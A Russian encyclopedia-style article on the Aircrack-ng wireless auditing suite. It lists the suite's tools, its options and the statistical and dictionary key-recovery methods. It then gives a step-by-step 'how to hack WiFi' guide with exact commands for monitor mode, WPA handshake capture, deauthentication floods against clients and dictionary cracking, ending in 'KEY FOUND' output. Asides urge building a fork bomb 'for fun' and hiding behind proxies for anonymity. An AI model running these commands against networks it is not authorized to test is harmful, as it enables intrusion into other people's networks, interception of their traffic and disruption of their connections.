Aircrack-ng

Материал из Википедии — свободной энциклопедии
Перейти к: навигация, поиск
Aircrack-ng
Aircrack-ng-new-logo.jpg
Airodump-ng 0-5.jpg
Aircrack-ng
Тип

Анализатор трафика (сниффер), проверка на возможность проникновения и аудит беспроводных сетей

Разработчик

Thomas d'Otreppe

Написана на

C

Операционная система

Кроссплатформенное программное обеспечение

Языки интерфейса

Английский

Последняя версия

Aircrack-ng 1.2 RC 4 (14 февраля 2016)

Бета-версия
Лицензия

GPL

Сайт

aircrack-ng.org

Aircrack-ng[править | править код]

это набор программ, которые предназначены для обнаружения, анализа, перехвата и взлома беспроводных сетей и соответствующего сетевого трафика. С помощью инструментария, представленного в данном пакете, можно

  • взламывать протоколы безопасности WEP и WPA/WPA2-PSK
  • тестировать беспроводные сети на уязвимость к внешним атакам (penetration test)
  • проводить проверку стойкости сети

Программа работает с любыми беспроводными сетевыми адаптерами, драйвер которых поддерживает режим мониторинга. Aircrack-ng был запущен в конце февраля 2006 года.[1]

Программа работает в операционных системах Windows, UNIX, Linux и Mac OS X. Версия для UNIX-подобных операционных систем имеет значительно большую функциональность и поддерживает больше беспроводных адаптеров, чем Windows-версия. aircrack-ng был также портирован для платформ Zaurus и Maemo. Также программа была портирована для iPhone.

Указанный продукт представлен в двух основных вариантах:

  • Консольном (для более опытных пользователей и специалистов)
  • Графическом (GUI) – удобный графический формат

Возможности Aircrack-ng[править | править код]

Программный пакет aircrack-ng включает:

Имя Описание
aircrack-ng Взламывает ключи WEP и WPA (Перебор по словарю).
airdecap-ng Расшифровывает перехваченный трафик при известном ключе.
airmon-ng Выставление различных карт в режим мониторинга.
aireplay-ng Пакетный инжектор (Linux и Windows).
airodump-ng Анализатор трафика: Помещает трафик в файлы PCAP или IVS и показывает информацию о сетях.
airtun-ng Создаёт виртуальный интерфейс туннелирования.
packetforge-ng Создаёт шифрованные пакеты для инъекции.
ivstools Инструменты для слияния и конвертирования.
airbase-ng Предоставляет техники для атаки клиента.
airdecloak-ng Убирает WEP-маскировку с файлов pcap.
airolib-ng Хранит и управляет списками ESSID и паролей, вычисляет парные мастер-ключи.
airserv-ng Открывает доступ к беспроводной сетевой карте с других компьютеров.
buddy-ng Сервер-помощник для easside-ng, запущенный на удалённом компьютере.
easside-ng Инструмент для коммуникации с точкой доступа без наличия WEP-ключа.
tkiptun-ng Атака WPA/TKIP.
wesside-ng Автоматический инструмент для восстановления WEP-ключа.

Параметры Aircrack-ng[2][править | править код]

aircrack-ng [options] <capture file (s)>

Вы можете определять множество файлов для ввода (в формате.cap или.ivs). Также вы можете запускать airodump-ng и aircrack-ngодновременно. Aircrack-ng автоматически обновит свои данные при поступлении новых IV в файл дампа.

Вот список возможных параметров:

Общие параметры:

-a Принудительный режим атаки, 1 или wep для WEP и 2либо wpa для WPA-PSK
-e Выберите цель атаки на основании ESSID. Этот параметр также требуется для взлома WPA если SSID скрыто
-b или -bssid Выбрать цель на основании MAC адреса точки доступа
-p Установите эту опцию равной, числу процессоров которые используете, доступно только в SMP системах. По умолчанию используются все доступные процессоры
-q Если будет выбран этот параметр на дисплей не будет, выводится никакой информации о состоянии
-C или -combine Объединяет все MAC точки доступа, разделенные запятыми, в одну виртуальную
-I Записать ключ в файл
-E Создать Elcomsoft Wireless Security Auditor (EWSA). Файл проекта версии v3.02

Статистические варианты взлома WEP:

-c Поиск только буквенно цифровых символов
-t Поиск бинарных кодов, только десятичных символов
-h Поиск цифровых клавиш для Fritz!
-d или -debug Указать маску ключа. Например: A1:XX:CF
-m Выбирать из пакетов Ivs соответствующих только данному MAC адресу. Кроме того использование -m ff:ff:ff:ff:ff:ff позволяет использовать все Ivs, независимо от сети. Это значит что отключается ESSID и BSSIDфильтрация
-n Укажите длину ключа: 64 для 40-bit WEP, 128 для 104-bit WEP и тд. длина до 512 bits. По умолчанию длина ключа задана 128 bit
-i Сохранять только Ivs введенный ключевой индекс от 1до 4. По умолчанию игнорируется ключевой индекс пакета
-f По умолчанию этот параметр установлен на 2. Используйте большее значение для увеличения уровня перебора паролей: взлом потребует больше времени, но с большими шансы на успех
-k Существует 17 KoreK атак. Временами одна атака создает большое количество ложноположительных ответов, что мешает нахождению ключа, даже с большим количеством Ivs. Попробуйте -k 1, -k 2, … -k 17 чтобы проверить каждую атаку выборочно
-x или -x0 Отключить последний брутфорс (не рекомендуется)
-x1 Включает последний брутфорс (установлено по умолчанию)
-x2 Включает два последние брутфорса
-X Отключает многопоточный брутфорс ( только для SMP)
-s Показывает ASCII версию ключа с правой части экрана
-y Это экспериментальная атака грубой силы, должна использоваться только тогда когда обычные способы не помогают более чем с одним миллионом Ivs
-z Использование PTW (Andrei Pyshkin, Erik Tews and Ralf-Philipp Weinmann) атак. Данная атака используется по умолчанию
-P или -ptw-debug Отладка PTW: 1отключить klein, 2 PTW
-K Использование KoreK атаки вместо PTW
-D или -wep-decloak WEP decloak режим
-1 или -oneshot Запустить только одну попытку взломать ключ с PTW
-M Указать какое количество IVs использовать

WEP и WPA-PSK параметры взлома:

-S тест скорости взлома WPA
-r Путь к airolib-ng базе данных. Нельзя использовать вместе с «-w»

Другие параметры:

-H или -help Показать экран помощи
-u или -cpu-detect Показать информацию о количестве процессоров MMX/SSE поддержке

AirCrack-NG работает[3][править | править код]

Поиск ключа происходит с помощью трех методов:

  • первый метод через PTW атаку, основное преимущество этого метода, заключается в том, что для взлома WEP ключа необходимо меньше перехваченных пакетов, основной недостаток этого метода это то, что он может работать только с arp пакетами.
  • второй метод через FMS / KoreK атаки – это метод включает в себя различные статические воздействия (FMS, KoreK, Brute force) для поиска WEP ключа и требует больше пакетов, чем первый метод.
  • третий метод – это метод подбора с использованием словаря (word list), этот метод в основном используется для взлома WPA/WPA2 ключей, так как первый и второй метод не работают для WPA/WPA2 взлома.

Когда используются статистические методы для взлома ключа WEP, в основном обрабатывается индивидуально. При использовании статистического механизма, возможность угадать определенный байт в ключе доходит до 15% когда вы отловили правильный вектор инициализации. По существу некоторые IVы «пропускают» секретный WEP ключ для специфических ключевых байтов. Это фундаментальные основы атак статистического метода.

При использовании некоторых методов статистических атак таких как FMS и атака KoreK голоса собираются для каждого ключевого байта секретного ключа WEP. Различные атаки имеют разное число голосов связанных с ними, так как вероятность каждой атаки приводящей к правильному ответу измеряется математически. Чем больше голосов накапливает потенциальная ключевая последовательность, тем больше вероятности что она будет верной. Для каждого ключевого байта экран показывает вероятный секретный ключ и число голосов накопленных для него. Само собой разумеется, что ключ имеющий наибольшее число голосов наиболее правилен, но это не гарантируется. Aircrack-ngв последствии проверит ключ чтоб подтвердить его правильность.

Мы надеемся что рассматриваемый пример поможет лучше понять это. На скриншоте выше вы можете заметить что ключевой байт 0 байт 0xAE набрал некоторое кол-во голосов, в данном случае 50. Так, можно сделать вывод, что математическая вероятность того что байт 0xAE более верный нежели второй в этой строке 0?11. Именно по этому, чем больше данных вы имеете, тем больше вероятности что aircrack-ngподберет верный ключ.

Статистический метод может вам показаться слишком сложным. Его идея заключается в накоплении как можно большего кол-ва статистических данных и последующем подборе с использованием грубой силы. Aircrack-ng использует грубую силу на вероятных ключах чтобы фактически определить WEP ключ.

Здесь присутствует фактор вероятности. В основном, фактор вероятности говорит программе aircrack-ng как использовать брутфорс. Это похоже на то, как если бы бросили мяч в некий квадрат и сказали кому-нибудь что он находится между 0 и 10 метром (0 и 30 футов).А другому скажут что он находится где-то между 0 и 100 метром. Тому чей квадрат поиска шире — потребуется значительно больше времени чтобы найти шар, но в тоже время вероятность его обнаружения будет больше. Это альтернатива между скоростью и вероятностью.

Например если вы скажете aircrack-ng использовать фактор вероятности 2, он возьмет максимально возможный байт, и проверит все возможности которые хотя бы на половину вероятны как он, используя брутфорс. Чем больше фактор вероятности, тем больше у aircrack-ngоснований к применению брутфорса. Имейте ввиду, что повышая фактор вероятности вы также повышаете кол-во возможных ключей, а также и время работы. И снова, именно по этому необходимо иметь как можно больше данных для минимизации процессорного времени.

Наконец — это всего лишь «простая» математика и подбор!

Для взлома ключей WEP в программу также включен метод подбора по словарю. Для WEP, вы можете использовать статистический метод описанный выше, или метод подбора по словарю, но не оба одновременно. При использовании метода подбора по словарю, вы сначала создаете файл, в котором содержатся ascii или шестнадцатеричные ключи. Один файл может содержать один тип ключей. Объединять их нельзя.Это можно проверить запустив aircrack-ng которая проверит каждый ключ на возможность его использования.

Методы и технологии описанные выше не работают для предразделенных ключей WPA/WPA2. Единственный способ взломать эти предразделенные ключи — через подбор по словарю. Эта возможность также включена в aircrack-ng.

С предразделенными ключами (pre-shared keys) клиент и точка вначале доступа устанавливают ключи, которые будут использоваться при соединении. Есть четыре шага для идентификации клиента. airodump-ng может захватить эти шаги. При использовании ввода из списка слов (словарь) aircrack-ng дублирует четырех шаговую идентификацию чтобы видеть соответствуют ли слова из словаря результату идентификации. Если это так, то вы получите правильный предразделенный ключ.

Необходимо отметить, что этот процесс требует очень интенсивной работы компьютера  и очень маловероятно что будут определены большие ключи. Хороший словарь даст вам более хорошие результаты. Другой подход состоит в использовании johntheripper для подбора пароля, перенаправив на него вывод aircrack-ng.

Инструкция AirCrack-NG — Взлом WiFi[править | править код]

Как взломать WiFi — основные шаги:

  • Установите последнюю версии aircrack-ng
  • Переведите беспроводной сетевой интерфейс в режим мониторинга с помощью airmon-ng
  • Запустите airodump-ng для перехвата рукопожатия на канале точки доступа с фильтрацией по BSSID
  • [Опционально] Используйте aireplay-ng для де-аутентификации клиента
  • Запустите aircrack-ng для взлома WPA/WPA2-PSK с помощью перехваченного рукопожатия

Шаг 1. Aircrack-ng: Скачать и Установить[править | править код]

Только Последняя Версия: Если вы действительно хотите взломать WiFi — не стоит устанавливать устаревший aircrack-ng из репозитория ваше операционной системы. Скачайте и скомпилируйте последнюю версию самостоятельно.

Установите необходимы зависимости:

$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev

Скачайте и установите последнюю версию aircrack-ng (текущая версия [4]):

$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz  -O - | tar –xz
$ cd aircrack-ng-1.2-rc4
$ sudo make
$ sudo make install

Убедитесь что установлена именно последняя версия aircrack-ng:

$ aircrack-ng --help
  Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe
  http://www.aircrack-ng.org

Шаг 2. Airmon-ng: Режим Мониторинга[править | править код]

Теперь необходимо перевести беспроводной сетевой интерфейс в режим мониторинга. Режим мониторинга позволяет компьютеру с беспроводным сетевым интерфейсом мониторить весь трафик в беспроводной сети. Что особенно для нас важно, так это то, что режим мониторинга позволяет перехватывать все передающиеся пакеты без непосредственного подключения к какому-либо WiFi роутеру.

Найдите и остановите все процессы, которые могут помешать:

$ sudo airmon-ng check kill

Запустите беспроводной интерфейс в режиме мониторинга:

$ sudo airmon-ng start wlan0
Interface      Chipset        Driver
wlan0          Intel 6235     iwlwifi - [phy0]
                               (monitor mode enabled on mon0)

В приведенном выше примере, airmon-ng создал новый беспроводной интерфейс mon0 и переключил его в режим мониторинга. Таким образом, mon0 — это правильное имя интерфейса, которое мы будем использовать далее в этом руководстве.

Шаг 3. Airodump-ng: Перехват Рукопожатия[править | править код]

Дельный Совет: Хотите немного «развлечься»? Создайте форк-бомбу в Linux! Одна маленькая строчка, способная повесить всю систему! [5]

Теперь, когда беспроводной адаптер переведен в режим мониторинга, у нас появилась возможность видеть весь проходящий мимо нас трафик.

Это можно сделать с помощью команды airodump-ng:

$ sudo airodump-ng mon0

Все видимые точки доступа показаны в верхней части экрана, а подключенные клиенты в нижней:

CH 1 ][ Elapsed: 20 s ][ 2014-05-29 12:46
BSSID              PWR  Beacons   #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
00:11:22:33:44:55  -48     212     1536   66  1  54e  WPA2 CCMP  PSK  CrackMe
66:77:88:99:00:11  -64     134     345   34   1  54e WPA2 CCMP   PSK  SomeAP
BSSID              STATION            PWR   Rate   Lost    Frames  Probe
00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44   0 - 1    114       56
00:11:22:33:44:55  GG:HH:II:JJ:KK:LL  -78   0 - 1      0       1
66:77:88:99:00:11  MM:NN:OO:PP:QQ:RR  -78   2 - 32      0       1

Для того, чтобы поймать рукопожатие, определите интересующую вас точку доступа и запустите airodump-ng на том же канале с фильтром по BSSID:

$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
Опция Описание
-c Канал беспроводной сети
--bssid MAC адрес точки доступа
-w Префикс файла в который будет записано рукопожатие
mon() Сетевой интерфейс
--ignore-negative-one Убирает сообщение ‘fixed channel : -1’

Теперь нам остается только ждать когда airodump-ng словит рукопожатие. Если вы хотите ускорить этот процесс — перейдите к шагу #4 и попытайтесь заставить подключенного беспроводного клиента переподключиться к роутеру. По прошествию некоторого времени вы должны увидеть сообщение WPA handshake: 00:11:22:33:44:55 в правом верхнем углу экрана.

Это сообщение означает, что airodump-ng успешно перехватил рукопожатие:

CH 1 ][ Elapsed: 45 s ][ 2014-05-29 13:15  WPA handshake: 00:11:22:33:44:55
BSSID              PWR  Beacons   #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
00:11:22:33:44:55  -48     212     1536   66   1  54e WPA2 CCMP   PSK  CrackMe
BSSID              STATION            PWR   Rate   Lost    Frames  Probe
00:11:22:33:44:55  AA:BB:CC:DD:EE:FF  -44   0 - 1    114       56

Шаг 4. Aireplay-ng: Деаутентификации Клиента[править | править код]

Дельный Совет: Хотите сохранить анонимность? Узнайте как использовать ПРОКСИ из командной строки в Linux.[6]

Если вы не хотите ждать пока airodump-ng перехватит рукопожатие, вы можете сами попробовать отправить сообщение клиенту, сказав что он больше не подключен к точке доступа. После этого есть вероятность того, что беспроводной клиент попробует переподключиться и мы сможем перехватил рукопожатие.

Отправить широковещательное deauth сообщение:

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one

Отправить направленное deauth сообщение (атака более эффективна когда направленна на конкретного клиента):

$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one
Опция Описание
--deauth 100 Сколько deauth сообщений отправить (0 — без ограничений)
-a MAC адрес точки доступа
-c MAC адрес клиента
mon0 Сетевой интерфейс
--ignore-negative-one Убирает сообщение ‘fixed channel : -1’

Дельный Совет: Нужно взломать пароль от WiFi? Не тратьте свое время попусту! Используйте «John the Ripper» —самый быстрый взломщик паролей! [7]

Шаг 5. Aircrack-ng: Взлом WiFi Пароля[править | править код]

К сожалению, кроме как с помощью грубой силы, не существует способа взлома WPA/WPA2-PSK шифрования. Для взлома WiFi необходим словарь с паролями для перебора. Главное помните, что этот способ взлома настолько хорош, насколько хорош ваш словарь с паролями. Некоторые словари можно скачать отсюда[8].

Выполните следующую команду, чтобы взломать WPA/WPA2-PSK:

$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap
Опция Описание
-w Путь к словарю с паролями
-b MAC адрес точки доступа
WPAcrack.cap Файл, содержащий перехваченное рукопожатие
Aircrack-ng 1.2 beta3 r2393
                   [00:08:11] 548872 keys tested (1425.24 k/s)
                           KEY FOUND! [ 987654321 ]
      Master Key    : 5C 9D 3F B6 24 3B 3E 0F F7 C2 51 27 D4 D3 0E 97 
                       CB F0 4A 28 00 93 4A 8E DD 04 77 A3 A1 7D 15 D5 
      Transient Key : 3A 3E 27 5E 86 C3 01 A8 91 5A 2D 7C 97 71 D2 F8 
                       AA 03 85 99 5C BF A7 32 5B 2F CD 93 C0 5B B5 F6 
                       DB A3 C7 43 62 F4 11 34 C6 DA BA 38 29 72 4D B9 
                       A3 11 47 A6 8F 90 63 46 1B 03 89 72 79 99 21 B3 
      EAPOL HMAC    : 9F B5 F4 B9 3C 8B EA DF A0 3E F4 D4 9D F5 16 62

Дельный Совет: Взлом пароля часто занимает много времени. Объедините aircrack-ng с «John The Ripper», чтобы иметь возможность ставить перебор на паузу без потери текущего прогресса! Читать далее[9]

Преимущества[править | править код]

  • Aircrack-ng почти наверняка гарантированно работает
  • Обеспечивает возможность запуска последних версий aircrack-ng и любого беспроводного драйвера
  • Обеспечивает максимальную гибкость

Недостатки[править | править код]

  • Требуется много знаний об Linux

См. также[править | править код]

Примечания[править | править код]

  1. Main [Aircrack-ng(англ.). www.aircrack-ng.org. Проверено 30 ноября 2017.
  2. aircrack-ng [Aircrack-ng(англ.). www.aircrack-ng.org. Проверено 30 ноября 2017.
  3. aircrack-ng [Aircrack-ng(англ.). www.aircrack-ng.org. Проверено 30 ноября 2017.
  4. install_aircrack [Aircrack-ng(англ.). www.aircrack-ng.org. Проверено 30 ноября 2017.
  5. Как: Создать Fork-бомбу в Линуксе - ShellHacks (ru-RU), ShellHacks (27 декабря 2016). Проверено 30 ноября 2017.
  6. Linux: Настройка Прокси Сервера Для Командной Строки - ShellHacks (ru-RU), ShellHacks (27 декабря 2016). Проверено 30 ноября 2017.
  7. Устанавливаем "John the Ripper" - Взломщик Паролей - ShellHacks (ru-RU), ShellHacks (27 декабря 2016). Проверено 30 ноября 2017.
  8. Passwords - SkullSecurity (англ.). wiki.skullsecurity.org. Проверено 30 ноября 2017.
  9. Aircrack-ng: Пауза и Возобновление Перебора Паролей - ShellHacks (ru-RU), ShellHacks (27 декабря 2016). Проверено 30 ноября 2017.

Ссылки[править | править код]